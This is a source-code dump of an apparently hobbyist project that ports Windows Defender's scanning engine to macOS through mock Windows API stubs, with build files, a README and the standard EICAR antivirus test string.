├── mac-defender ├── sample ├── eicar.bin └── jsmal.txt ├── faketmp └── demo.png ├── mac-defender.xcodeproj ├── project.xcworkspace │ ├── contents.xcworkspacedata │ ├── xcuserdata │ │ └── orca.xcuserdatad │ │ │ ├── UserInterfaceState.xcuserstate │ │ │ └── WorkspaceSettings.xcsettings │ └── xcshareddata │ │ ├── WorkspaceSettings.xcsettings │ │ └── IDEWorkspaceChecks.plist ├── xcuserdata │ └── orca.xcuserdatad │ │ └── xcschemes │ │ └── xcschememanagement.plist ├── xcshareddata │ └── xcschemes │ │ └── mac-defender.xcscheme └── project.pbxproj ├── winapi ├── dlls │ ├── wofutil.cpp │ ├── wintrust.cpp │ ├── version.cpp │ ├── crypt32.cpp │ ├── wofutil.h │ ├── dxgi.h │ ├── bcrypt.cpp │ ├── rpcrt4.cpp │ ├── dxgi.cpp │ ├── include │ │ └── wintype.h │ ├── wintrust.h │ ├── rpcrt4.h │ ├── ole32.cpp │ ├── version.h │ ├── crypt32.h │ ├── bcrypt.h │ ├── ole32.h │ ├── advapi32.h │ ├── advapi32.cpp │ └── ntdll.h ├── exports.h ├── imports.cpp ├── imports.h ├── strutils.hpp ├── ntoskrnl.h ├── exports.cpp ├── strutils.cpp └── ntoskrnl.cpp ├── engine └── Readme.md ├── log.hpp ├── README.md ├── cb ├── cb.h └── cb.cpp ├── of-loadlib.sln ├── mpcore ├── mpcore.h ├── openscan.h ├── rsignal.h ├── scanreply.h ├── engineboot.h └── streambuffer.h ├── .gitattributes ├── main.cpp ├── reg └── mock_reg.json ├── wrapper.hpp ├── of-loadlib.vcxproj.filters ├── .gitignore ├── of-loadlib.vcxproj ├── loader.hpp └── include └── jsoncpp └── json └── json-forwards.h /mac-defender: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orca-eaa5a/mac-defender/HEAD/mac-defender -------------------------------------------------------------------------------- /sample/eicar.bin: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* -------------------------------------------------------------------------------- /faketmp/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orca-eaa5a/mac-defender/HEAD/faketmp/demo.png -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /winapi/dlls/wofutil.cpp: -------------------------------------------------------------------------------- 1 | #include "wofutil.h" 2 | 3 | bool __stdcall MockWofUtil::WofShouldCompressBinaries(char16_t* Volume, uint32_t* Algorithm) { 4 | debug_log(" called..\n", "WofShouldCompressBinaries"); 5 | 6 | return false; 7 | } 8 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.xcworkspace/xcuserdata/orca.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orca-eaa5a/mac-defender/HEAD/mac-defender.xcodeproj/project.xcworkspace/xcuserdata/orca.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /engine/Readme.md: -------------------------------------------------------------------------------- 1 | ## mpengine 2 | 1. File : Unpacked mpam-fe(x64).exe 3 | 2. Arch : x86_64 4 | 3. Version : 1.1.14405.2 5 | 4. Engine Relase Date : '17. 11. 18 6 | 5. Signature Release Date : '18. 1. 16 7 | 6. Link : https://drive.google.com/file/d/1gdZ_QGjB2wkUTbcNjFX8xxcLAzlllzg6/view?usp=sharing 8 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.xcworkspace/xcshareddata/WorkspaceSettings.xcsettings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | PreviewsEnabled 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /winapi/dlls/wintrust.cpp: -------------------------------------------------------------------------------- 1 | #include "wintrust.h" 2 | 3 | bool __stdcall MockWintrust::CryptCATAdminAcquireContext(void* phCatAdmin, void* pgSubsystem, uint32_t dwFlags) { 4 | debug_log(" called..\n", "CryptCATAdminAcquireContext"); 5 | 6 | return true; 7 | } 8 | 9 | void* __stdcall MockWintrust::CryptCATAdminEnumCatalogFromHash(void* hCatAdmin, uint8_t* pbHash, uint32_t cbHash, uint32_t dwFlags, void* phPrevCatInfo) { 10 | debug_log(" called..\n", "CryptCATAdminEnumCatalogFromHash"); 11 | 12 | return NULL; 13 | } 14 | -------------------------------------------------------------------------------- /log.hpp: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef _LOG_H_ 5 | #define _LOG_H_ 6 | #include 7 | #include 8 | 9 | enum MSGTYPE{ 10 | INFO = 1, 11 | ERR, 12 | CRIT, 13 | }; 14 | auto console_log = [](MSGTYPE msg_type, const char* msg) { 15 | 16 | switch (msg_type) 17 | { 18 | case INFO: 19 | printf("[%s] %s\n", "INFO", msg); 20 | break; 21 | case ERR: 22 | printf("[%s] %s", "ERROR", msg); 23 | assert(0); 24 | break; 25 | case CRIT: 26 | printf("[%s] %s\n", "CRIT", msg); 27 | exit(-1); 28 | default: 29 | printf("Unknown Message Type\n"); 30 | exit(-1); 31 | } 32 | }; 33 | #endif -------------------------------------------------------------------------------- /winapi/exports.h: -------------------------------------------------------------------------------- 1 | #ifndef _API_H_ 2 | #define _API_H_ 3 | #include 4 | #include 5 | #include 6 | 7 | #if defined(__APPLE__) || defined(__LINUX__) 8 | #include "dlls/include/windows.h" 9 | #else 10 | #include 11 | #endif 12 | 13 | using namespace std; 14 | class APIExports { 15 | public: 16 | static map> exports; 17 | static void add_hook_info(string mod_name, string func_name, void* addr); 18 | static bool hook_as_ported_api(void* imgbase, char* targ_module, char* targ_api, void* hook_addr); 19 | static void hook_api_bulk(void* image_base); 20 | }; 21 | 22 | #endif // !_API_H_ 23 | -------------------------------------------------------------------------------- /winapi/imports.cpp: -------------------------------------------------------------------------------- 1 | #include "imports.h" 2 | 3 | void ImportDLLs::setup_dlls() { 4 | this->kernel32.set_k32_hookaddr(); 5 | this->ntdll.set_ntdll_hookaddr(); 6 | this->advapi.set_advapi_hookaddr(); 7 | this->bcrypt.set_bcrypt_hookaddr(); 8 | this->version.set_version_hookaddr(); 9 | this->crypt32.set_crypt32_hookaddr(); 10 | this->wofutil.set_wofutil_hookaddr(); 11 | this->wintrust.set_wintrust_hookaddr(); 12 | this->ole32.set_ole32_hookaddr(); 13 | this->rpcrt4.set_rpcrt4_hookaddr(); 14 | //this->dxgi.set_dxgi_hookaddr(); 15 | } 16 | 17 | void ImportDLLs::set_ported_apis(void) { 18 | APIExports::hook_api_bulk(this->engine_base); 19 | } 20 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/xcuserdata/orca.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | mac-defender.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | 2414B861277DD97B0074F04B 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /winapi/dlls/version.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "version.h" 3 | 4 | uint32_t __stdcall MockVersion::GetFileVersionInfoSizeExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t* lpdwHandle) { 5 | debug_log(" called..\n", "GetFileVersionInfoSizeExW"); 6 | 7 | return 0; 8 | } 9 | 10 | bool __stdcall MockVersion::GetFileVersionInfoExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t dwHandle, uint32_t dwLen, void* lpData) { 11 | debug_log(" called..\n", "GetFileVersionInfoExW"); 12 | 13 | return true; 14 | } 15 | 16 | bool __stdcall MockVersion::VerQueryValueW(void* pBlock, char16_t* lpSubBlock, void** lplpBuffer, uint32_t* puLen) { 17 | debug_log(" called..\n", "VerQueryValueW"); 18 | 19 | return true; 20 | } 21 | 22 | -------------------------------------------------------------------------------- /winapi/dlls/crypt32.cpp: -------------------------------------------------------------------------------- 1 | #include "crypt32.h" 2 | 3 | void* __stdcall MockCrypt32::CertOpenStore(char* lpszStoreProvider, uint32_t dwMsgAndCertEncodingType, void* hCryptProv, uint32_t dwFlags, void* pvPara) { 4 | debug_log(" called..\n", "CertOpenStore"); 5 | 6 | return (HANDLE) 'mock'; 7 | } 8 | bool __stdcall MockCrypt32::CertCloseStore(void* hCertStore, uint32_t dwFlags) { 9 | debug_log(" called..\n", "CertCloseStore"); 10 | 11 | return true; 12 | } 13 | 14 | bool __stdcall MockCrypt32::CertStrToNameW(uint32_t dwCertEncodingType, void* pszX500, uint32_t dwStrType, void* pvReserved, uint8_t* pbEncoded, uint32_t* pcbEncoded, void* ppszError) { 15 | debug_log(" called..\n", "CertStrToNameW"); 16 | 17 | return false; 18 | } 19 | -------------------------------------------------------------------------------- /winapi/dlls/wofutil.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _WOFUTIL_H_ 6 | #define _WOFUTIL_H_ 7 | #include 8 | #include "../exports.h" 9 | #include "../strutils.hpp" 10 | 11 | #if defined(__APPLE__) || defined(__LINUX__) 12 | #include "include/windows.h" 13 | #endif 14 | 15 | class MockWofUtil { 16 | public: 17 | function set_wofutil_hookaddr = [](void) { 18 | APIExports::add_hook_info("wofutil.dll", "WofShouldCompressBinaries", (void*)WofShouldCompressBinaries); 19 | 20 | }; 21 | #if defined(__WINDOWS__) 22 | static bool __stdcall MockWofUtil::WofShouldCompressBinaries(char16_t* Volume, uint32_t* Algorithm); 23 | #else 24 | static bool __stdcall WofShouldCompressBinaries(char16_t* Volume, uint32_t* Algorithm); 25 | #endif 26 | }; 27 | #endif // !_WOFUTIL_H_ 28 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.xcworkspace/xcuserdata/orca.xcuserdatad/WorkspaceSettings.xcsettings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BuildLocationStyle 6 | UseAppPreferences 7 | CustomBuildLocationType 8 | RelativeToDerivedData 9 | DerivedDataCustomLocation 10 | /Users/orca/orca_lab/mac-defender 11 | DerivedDataLocationStyle 12 | AbsolutePath 13 | IssueFilterStyle 14 | ShowActiveSchemeOnly 15 | LiveSourceIssuesEnabled 16 | 17 | ShowSharedSchemesAutomaticallyEnabled 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /winapi/dlls/dxgi.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _DXGI_H_ 6 | #define _DXGI_H_ 7 | #include 8 | #include "../exports.h" 9 | //#include "../strutils.hpp" 10 | 11 | #if defined(__APPLE__) || defined(__LINUX__) 12 | #include "include/windows.h" 13 | #endif 14 | 15 | class MockDxgi { 16 | public: 17 | function set_dxgi_hookaddr = [](void) { 18 | //APIExports::add_hook_info("dxgi.dll", "CreateDXGIFactory", (void*)CreateDXGIFactory); 19 | APIExports::add_hook_info("dxgi.dll", "CreateDXGIFactory1", (void*)CreateDXGIFactory); 20 | }; 21 | #if defined(__WINDOWS__) 22 | static uint32_t __stdcall MockDxgi::CreateDXGIFactory(void* riid, void**ppFactory); 23 | 24 | #else 25 | static uint32_t __stdcall CreateDXGIFactory(void* riid, void**ppFactory); 26 | 27 | #endif 28 | 29 | }; 30 | #endif // !_DXGI_H_ 31 | -------------------------------------------------------------------------------- /winapi/dlls/bcrypt.cpp: -------------------------------------------------------------------------------- 1 | #include "bcrypt.h" 2 | 3 | NTSTATUS __stdcall MockBcrypt::BCryptOpenAlgorithmProvider(void* phAlgorithm, char16_t* pszAlgId, char16_t* pszImplementation, uint32_t dwFlags){ 4 | debug_log(" called..\n", "BCryptOpenAlgorithmProvider"); 5 | 6 | return 0; 7 | } 8 | 9 | NTSTATUS __stdcall MockBcrypt::BCryptCloseAlgorithmProvider(void* hAlgorithm, uint32_t dwFlags){ 10 | debug_log(" called..\n", "BCryptCloseAlgorithmProvider"); 11 | 12 | return 0; 13 | } 14 | 15 | NTSTATUS __stdcall MockBcrypt::BCryptGenRandom(void* phAlgorithm, uint8_t* pbBuffer, uint32_t cbBuffer, uint32_t dwFlags){ 16 | debug_log(" called..\n", "BCryptGenRandom"); 17 | 18 | for (int i = 0; cbBuffer > i * 2; i++) { 19 | uint16_t r = (uint16_t)rand(); 20 | memset((pbBuffer+i), r, sizeof(uint16_t)); 21 | } 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /winapi/dlls/rpcrt4.cpp: -------------------------------------------------------------------------------- 1 | #include "rpcrt4.h" 2 | 3 | uint32_t __stdcall MockRpcrt4::UuidFromStringW(char16_t* StringUuid, void* Uuid) 4 | { 5 | typedef struct _GUID { 6 | uint32_t Data1; 7 | uint16_t Data2; 8 | uint16_t Data3; 9 | uint8_t Data4[8]; 10 | } GUID; 11 | debug_log(" called..\n", "UuidFromStringW"); 12 | 13 | memset(Uuid, 'mock', sizeof(GUID)); 14 | /* 15 | for (i = 0; i < 16; i++) { 16 | memset((uint64_t*)Uuid + i, 'mock', sizeof(void*)); 17 | } 18 | */ 19 | return 0; 20 | } 21 | 22 | uint32_t __stdcall MockRpcrt4::RpcBindingFree(void* Binding) { 23 | debug_log(" called..\n", "RpcBindingFree"); 24 | 25 | return 1702; //RPC_S_INVALID_BINDING 26 | } 27 | 28 | 29 | void __stdcall MockRpcrt4::NdrServerCallAll(void* pRpcMsg) { 30 | debug_log(" called..\n", "NdrServerCallAll"); 31 | 32 | return; 33 | } 34 | 35 | void* __stdcall MockRpcrt4::NdrClientCall3(void *pProxyInfo, uint32_t nProcNum, void* pReturnValue, ...) { 36 | debug_log(" called..\n", "NdrClientCall3"); 37 | 38 | return NULL; 39 | } 40 | 41 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MacDefender 2 | Port Windows Defender to OSX 3 | ![demo](./faketmp/demo.png) 4 | 5 | ## Feature 6 | 1. Remove all __dependency of Windows__ by porting WIN API 7 | 2. Support __64bit OS__ 8 | 3. Support Windows SEH(x64) in OSX 9 | 4. Only for __Intel__ (M1 is not supported) 10 | 11 | ## Installation and Setup 12 | 13 | 1. Clone 14 | ```bash 15 | git clone https://github.com/orca-eaa5a/mac-defender.git 16 | ``` 17 | 2. Set Pre-Defined Macros 18 | - \_\_APPLE\_\_ , \_X64 19 | - \_\_LOG\_\_ ([optional] logging ported WIN API Call) 20 | 3. Build use __GCC__ (not clang) 21 | 22 | ## Usage 23 | 24 | ```bash 25 | ./mac-defender $target_file 26 | ``` 27 | 28 | ## Notice 29 | - This project only for __mpengine version 1.1.14405.2__ 30 | - other version maybe not working and lastest version will crushed.. 31 | 32 | 33 | ## Reference 34 | 1. https://github.com/taviso/loadlibrary 35 | 2. https://github.com/reactos/reactos 36 | 3. https://github.com/wine-mirror/wine 37 | 4. https://github.com/mandiant/speakeasy 38 | 5. https://github.com/orca-eaa5a/winx86emulator 39 | 40 | 41 | ## License 42 | [GPL](https://choosealicense.com/licenses/mit/) License 43 | -------------------------------------------------------------------------------- /winapi/imports.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef _IMP_H_ 5 | #define _IMP_H_ 6 | 7 | 8 | #include "dlls/kernel32.h" 9 | #include "dlls/ntdll.h" 10 | #include "dlls/advapi32.h" 11 | #include "dlls/bcrypt.h" 12 | #include "dlls/version.h" 13 | #include "dlls/crypt32.h" 14 | #include "dlls/wofutil.h" 15 | #include "dlls/wintrust.h" 16 | #include "dlls/ole32.h" 17 | #include "dlls/rpcrt4.h" 18 | #include "dlls/dxgi.h" 19 | #include "ntoskrnl.h" 20 | #include "exports.h" 21 | 22 | class ImportDLLs { 23 | public: 24 | void setup_dlls(void); 25 | 26 | ImportDLLs() { 27 | this->setup_dlls(); 28 | } 29 | 30 | ImportDLLs(void* engine_base) { 31 | this->engine_base = engine_base; 32 | this->setup_dlls(); 33 | } 34 | 35 | void set_ported_apis(void); 36 | 37 | 38 | private: 39 | MockKernel32 kernel32; 40 | MockNtdll ntdll; 41 | MockAdvapi advapi; 42 | MockBcrypt bcrypt; 43 | MockVersion version; 44 | MockCrypt32 crypt32; 45 | MockWofUtil wofutil; 46 | MockWintrust wintrust; 47 | MockOle32 ole32; 48 | MockRpcrt4 rpcrt4; 49 | MockDxgi dxgi; 50 | 51 | void* engine_base; 52 | 53 | }; 54 | 55 | #endif // !_IMP_H_ -------------------------------------------------------------------------------- /winapi/dlls/dxgi.cpp: -------------------------------------------------------------------------------- 1 | #include "dxgi.h" 2 | 3 | 4 | typedef bool(*enumAdapter)(void*, uint32_t, void*); 5 | typedef bool(*releaseAdapter)(void*); 6 | static int EnumAdapter(void* self, uint32_t a, void* b) { 7 | return 0x887A0002; //DXGI_ERROR_NOT_FOUND 8 | }; 9 | 10 | static void AdapterRelease(void* self) { 11 | delete self; 12 | } 13 | 14 | typedef struct MockIDXGIFactoryElem { 15 | uint8_t unk[0x10]; 16 | releaseAdapter _releaseAdapter; 17 | uint8_t unk2[0x20]; 18 | enumAdapter _enumAdapter; 19 | }MockIDXGIFactoryElem; 20 | 21 | typedef struct MockIDXGIFactory { 22 | MockIDXGIFactoryElem* elem; 23 | }; 24 | 25 | uint32_t __stdcall MockDxgi::CreateDXGIFactory(void* riid, void**ppFactory) { 26 | /* 27 | DXGI_ERROR_NOT_CURRENTLY_AVAILABLE 28 | 0x887A0022 29 | */ 30 | MockIDXGIFactory* factory = new MockIDXGIFactory; 31 | MockIDXGIFactoryElem* elem = new MockIDXGIFactoryElem; 32 | //memset(factory, 0, sizeof(MockIDXGIFactory)); 33 | factory->elem = elem; 34 | elem->_enumAdapter = (enumAdapter)EnumAdapter; 35 | elem->_releaseAdapter = (releaseAdapter)AdapterRelease; 36 | 37 | *ppFactory = (void*)factory; 38 | 39 | return 0; //DXGI_ERROR_NOT_FOUND 40 | } 41 | 42 | -------------------------------------------------------------------------------- /winapi/strutils.hpp: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _WINAPI_UTILS_H_ 6 | #define _WINAPI_UTILS_H_ 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #if defined(__APPLE__) || defined(__LINUX__) 14 | #include "dlls/include/windows.h" 15 | #else 16 | #include 17 | #endif 18 | 19 | using namespace std; 20 | 21 | extern char* convert_wstr_to_str(char16_t* wstr); 22 | extern char16_t* convert_str_to_wstr(char* str); 23 | extern char* convert_winpath_to_unixpath(char* winpath); 24 | extern char* convert_unixpath_to_winpath(char* unixpath); 25 | extern char* str_tolower(char* str); 26 | extern char* read_multibyte(void* ptr, size_t buf_sz); 27 | extern char16_t* read_widestring(void* ptr, size_t buf_sz); 28 | extern vector split_string(char* str, char delim); 29 | extern uint32_t copy_str_to_wstr(char* src, char16_t* dst, uint32_t str_len); 30 | extern int compare_wstr(char16_t* targ1, char16_t* targ2); 31 | extern uint32_t copy_wstr_to_str(char16_t* src, char* dst, uint32_t max_len); 32 | extern size_t get_wide_string_length(void* ptr); 33 | extern void debug_log(const char* fmt, ...); 34 | #endif // !_WINAPI_UTILS_H_ 35 | 36 | -------------------------------------------------------------------------------- /winapi/dlls/include/wintype.h: -------------------------------------------------------------------------------- 1 | #if defined(__APPLE__) || defined(__LINUX__) 2 | typedef uint8_t BYTE; 3 | typedef char16_t WCHAR; 4 | typedef uint32_t DWORD; 5 | typedef bool BOOL; 6 | typedef BOOL *PBOOL,*LPBOOL; 7 | typedef uint16_t WORD; 8 | typedef float FLOAT; 9 | typedef FLOAT *PFLOAT; 10 | typedef BYTE *PBYTE,*LPBYTE; 11 | typedef BYTE BOOLEAN; 12 | typedef int32_t *PINT,*LPINT; 13 | typedef WORD *PWORD,*LPWORD; 14 | typedef uint8_t UCHAR; 15 | typedef uint16_t USHORT; 16 | typedef int32_t *LPLONG; 17 | typedef DWORD *PDWORD,*LPDWORD; 18 | typedef uint64_t DWORD64; 19 | typedef void *PVOID,*LPVOID; 20 | typedef const void *PCVOID,*LPCVOID; 21 | typedef int32_t INT; 22 | typedef uint32_t UINT,*PUINT,*LPUINT; 23 | typedef uint64_t ULONGLONG; 24 | typedef int64_t LONGLONG; 25 | typedef uint32_t ULONG; // x86_64 OSX 26 | typedef LONGLONG LONG_PTR; 27 | typedef DWORD LCID, *PLCID; 28 | typedef uint64_t UINT64; 29 | typedef uint64_t* PULONG64; 30 | typedef WCHAR* PWSTR; 31 | #ifdef _X64 32 | typedef uint32_t UHALF_PTR; 33 | typedef uint64_t UINT_PTR; 34 | typedef uint64_t ULONG_PTR; 35 | #else 36 | typedef uint16_t UHALF_PTR; 37 | typedef uint32_t UINT_PTR; 38 | typedef uint32_t ULONG_PTR; 39 | #endif 40 | 41 | typedef PVOID HANDLE; 42 | #endif 43 | 44 | -------------------------------------------------------------------------------- /cb/cb.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef _CB_H_ 3 | #define _CB_H_ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "../mpcore/scanreply.h" 10 | #include "../winapi/dlls/include/wintype.h" 11 | 12 | #ifdef _X86 13 | 14 | uint32_t FullScanNotifyCallback(PSCAN_REPLY Scan); 15 | uint32_t ReadStreamCb(uint32_t fd, unsigned long long Offset, void* Buffer, uint32_t Size, uint32_t* SizeRead); 16 | uint32_t GetStreamSizeCb(uint32_t fd, uint32_t* FileSize); 17 | uint32_t GetIncremBufferSizeCb(uint32_t buf, uint32_t* BufSize); 18 | uint32_t ReadBufferCb(void* src, unsigned long long Offset, void* Buffer, uint32_t Size, uint32_t* SizeRead); 19 | const char16_t* GetStreamNameCb(void* self); 20 | 21 | #elif _X64 22 | 23 | uint64_t __stdcall FullScanNotifyCallback(PSCAN_REPLY Scan); 24 | uint64_t __stdcall ReadStreamCb(uint64_t fd, uint64_t Offset, void* Buffer, uint64_t Size, uint64_t* SizeRead); 25 | uint64_t __stdcall GetStreamSizeCb(uint64_t fd, uint64_t* FileSize); 26 | uint64_t __stdcall GetIncremBufferSizeCb(void* buf, uint64_t* BufSize); 27 | uint64_t __stdcall ReadBufferCb(void* src, uint64_t Offset, void* Buffer, uint32_t* Size, uint32_t* SizeRead); 28 | 29 | #endif // _X86 30 | char16_t* __stdcall GetStreamNameCb(void* self); 31 | 32 | #endif 33 | -------------------------------------------------------------------------------- /winapi/dlls/wintrust.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _WINTRUST_H_ 6 | #define _WINTRUST_H_ 7 | #include 8 | #include "../exports.h" 9 | #include "../strutils.hpp" 10 | 11 | #if defined(__APPLE__) || defined(__LINUX__) 12 | #include "include/windows.h" 13 | #endif 14 | 15 | class MockWintrust { 16 | public: 17 | function set_wintrust_hookaddr = [](void) { 18 | APIExports::add_hook_info("wintrust.dll", "CryptCATAdminAcquireContext", (void*)CryptCATAdminAcquireContext); 19 | APIExports::add_hook_info("wintrust.dll", "CryptCATAdminEnumCatalogFromHash", (void*)CryptCATAdminEnumCatalogFromHash); 20 | 21 | }; 22 | #if defined(__WINDOWS__) 23 | static bool __stdcall MockWintrust::CryptCATAdminAcquireContext(void* phCatAdmin, void* pgSubsystem, uint32_t dwFlags); 24 | static void* __stdcall MockWintrust::CryptCATAdminEnumCatalogFromHash(void* hCatAdmin, uint8_t* pbHash, uint32_t cbHash, uint32_t dwFlags, void* phPrevCatInfo); 25 | #else 26 | static bool __stdcall CryptCATAdminAcquireContext(void* phCatAdmin, void* pgSubsystem, uint32_t dwFlags); 27 | static void* __stdcall CryptCATAdminEnumCatalogFromHash(void* hCatAdmin, uint8_t* pbHash, uint32_t cbHash, uint32_t dwFlags, void* phPrevCatInfo); 28 | #endif 29 | 30 | }; 31 | #endif // !_WINTRUST_H_ 32 | -------------------------------------------------------------------------------- /winapi/dlls/rpcrt4.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef _RPCRT4_H_ 3 | #define _RPCRT4_H_ 4 | #include "../exports.h" 5 | #include "../strutils.hpp" 6 | #if defined(__WINDOWS__) 7 | #include 8 | #else 9 | #include "include/windows.h" 10 | #endif 11 | 12 | class MockRpcrt4 { 13 | public: 14 | function set_rpcrt4_hookaddr = [](void) { 15 | APIExports::add_hook_info("rpcrt4.dll", "UuidFromStringW", (void*)UuidFromStringW); 16 | APIExports::add_hook_info("rpcrt4.dll", "RpcBindingFree", (void*)RpcBindingFree); 17 | APIExports::add_hook_info("rpcrt4.dll", "NdrServerCallAll", (void*)NdrServerCallAll); 18 | APIExports::add_hook_info("rpcrt4.dll", "NdrClientCall3", (void*)NdrClientCall3); 19 | 20 | }; 21 | #if defined(__WINDOWS__) 22 | static uint32_t __stdcall MockRpcrt4::UuidFromStringW(char16_t* StringUuid, void* Uuid); 23 | static uint32_t __stdcall MockRpcrt4::RpcBindingFree(void* Binding); 24 | static void __stdcall MockRpcrt4::NdrServerCallAll(void* pRpcMsg); 25 | static void* __stdcall MockRpcrt4::NdrClientCall3(void *pProxyInfo, uint32_t nProcNum, void* pReturnValue, ...); 26 | #else 27 | static uint32_t __stdcall UuidFromStringW(char16_t* StringUuid, void* Uuid); 28 | static uint32_t __stdcall RpcBindingFree(void* Binding); 29 | static void __stdcall NdrServerCallAll(void* pRpcMsg); 30 | static void* __stdcall NdrClientCall3(void *pProxyInfo, uint32_t nProcNum, void* pReturnValue, ...); 31 | #endif 32 | }; 33 | #endif // !_RPCRT4_H_ 34 | -------------------------------------------------------------------------------- /winapi/dlls/ole32.cpp: -------------------------------------------------------------------------------- 1 | #include "ole32.h" 2 | 3 | 4 | uint32_t __stdcall MockOle32::CoCreateGuid(void* pguid) { 5 | struct WinGUID { 6 | uint32_t Data1; 7 | uint16_t Data2; 8 | uint16_t Data3; 9 | uint8_t Data4[8]; 10 | }; 11 | WinGUID* guid = new WinGUID; 12 | debug_log(" called..\n", "CoCreateGuid"); 13 | 14 | pguid = (void*)guid; 15 | return 0; 16 | } 17 | 18 | uint32_t __stdcall MockOle32::CoCreateInstance(void* rclsid, void* pUnkOuter, uint32_t dwClsContext, void* riid, void* ppv) { 19 | debug_log(" called..\n", "CoCreateInstance"); 20 | 21 | return 0xffffffff; 22 | } 23 | 24 | uint32_t __stdcall MockOle32::CoInitializeEx(void* pvReserved, uint32_t dwCoInit) { 25 | debug_log(" called..\n", "CoInitializeEx"); 26 | 27 | return 0xffffffff; 28 | } 29 | 30 | void __stdcall MockOle32::CoUninitialize() { 31 | debug_log(" called..\n", "CoUninitialize"); 32 | 33 | return; 34 | } 35 | 36 | uint32_t __stdcall MockOle32::IIDFromString(void* lpsz, void* lpiid) { 37 | debug_log(" called..\n", "IIDFromString"); 38 | 39 | return 0xffffffff; 40 | } 41 | uint32_t __stdcall MockOle32::CoSetProxyBlanket( 42 | void* pProxy, 43 | uint32_t dwAuthnSvc, 44 | uint32_t dwAuthzSvc, 45 | char16_t* pServerPrincName, 46 | uint32_t dwAuthnLevel, 47 | uint32_t dwImpLevel, 48 | void* pAuthInfo, 49 | uint32_t dwCapabilities 50 | ) { 51 | debug_log(" called..\n", "CoSetProxyBlanket"); 52 | 53 | return 0xffffffff; 54 | } 55 | -------------------------------------------------------------------------------- /of-loadlib.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.1525 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "of-loadlib", "of-loadlib.vcxproj", "{29CBD1F5-DA99-4145-AB47-49F6901066EF}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Debug|x64.ActiveCfg = Debug|x64 17 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Debug|x64.Build.0 = Debug|x64 18 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Debug|x86.ActiveCfg = Debug|Win32 19 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Debug|x86.Build.0 = Debug|Win32 20 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Release|x64.ActiveCfg = Release|x64 21 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Release|x64.Build.0 = Release|x64 22 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Release|x86.ActiveCfg = Release|Win32 23 | {29CBD1F5-DA99-4145-AB47-49F6901066EF}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {0FC69C12-F4A0-4D77-B5CE-F6574CF6B86A} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /winapi/dlls/version.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | 